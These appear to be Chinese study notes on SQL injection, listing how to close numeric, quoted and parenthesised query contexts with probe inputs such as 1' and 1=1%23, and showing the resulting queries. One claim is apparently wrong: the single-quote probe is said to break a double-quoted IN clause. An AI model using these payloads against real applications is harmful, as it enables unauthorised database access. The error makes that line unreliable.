数字型
select id, username,password from users where id = $id limit 0,1;
id输入:3%23
select id, username,password from users where id = 3%23 limit 0,1;
试探方法:
id输入:1'
select id, username,password from users where id = 1' limit 0,1; 语法错误,报错
id输入:1 and 1 =1%23
select id, username,password from users where id = 1 and 1 =1%23 limit 0,1;语法正确,查得出记录
id输入:1 and 1 =2%23
select id, username,password from users where id = 1 and 1 =2%23 limit 0,1; 语法正确,但查不出记录
单引号
select id, username,password from users where id = '$id' limit 0,1;
id输入:3'%23
select id, username,password from users where id = '3'%23' limit 0,1;
试探方法:
id输入:1'
select id, username,password from users where id = '1'' limit 0,1; 语法错误,报错
id输入:1' and 1=1%23
select id, username,password from users where id = '1' and 1=1%23' limit 0,1;语法正确,查得出记录
id输入:1' and 1=2%23
select id, username,password from users where id = '1' and 1=2%23' limit 0,1;语法正确,但查不出记录
双引号
select id, username,password from users where id = "$id" limit 0,1;
id输入:3"%23
select id, username,password from users where id = "3"%23" limit 0,1;
括号
select id, username,password from users where id in ($id);
id输入:3)%23
select id, username,password from users where id in (3)%23);
id输入:1,2,3)%23
select id, username,password from users where id in (1,2,3)%23);
括号加单引号
select id, username,password from users where id in ('$id');
id输入:3')%23
select id, username,password from users where id in ('3')%23');
试探方法:
id输入:1'
select id, username,password from users where id in ('1''); 语法错误,报错
id输入:1') and 1=1%23
select id, username,password from users where id in ('1') and 1=1%23'); 语法正确,查得出记录
id输入:1') and 1=2%23
select id, username,password from users where id in ('1') and 1=2%23'); 语法正确,但查不出记录
括号加双引号
select id, username,password from users where id in ("$id");
id输入:3")%23
select id, username,password from users where id in ("3")%23");
试探方法:
id输入:1'
select id, username,password from users where id in ("1'"); 语法错误,报错
id输入:1") and 1=1%23
select id, username,password from users where id in ("1") and 1=1%23"); 语法正确,查得出记录
id输入:1") and 1=2%23
select id, username,password from users where id in ("1") and 1=2%23"); 语法正确,但查不出记录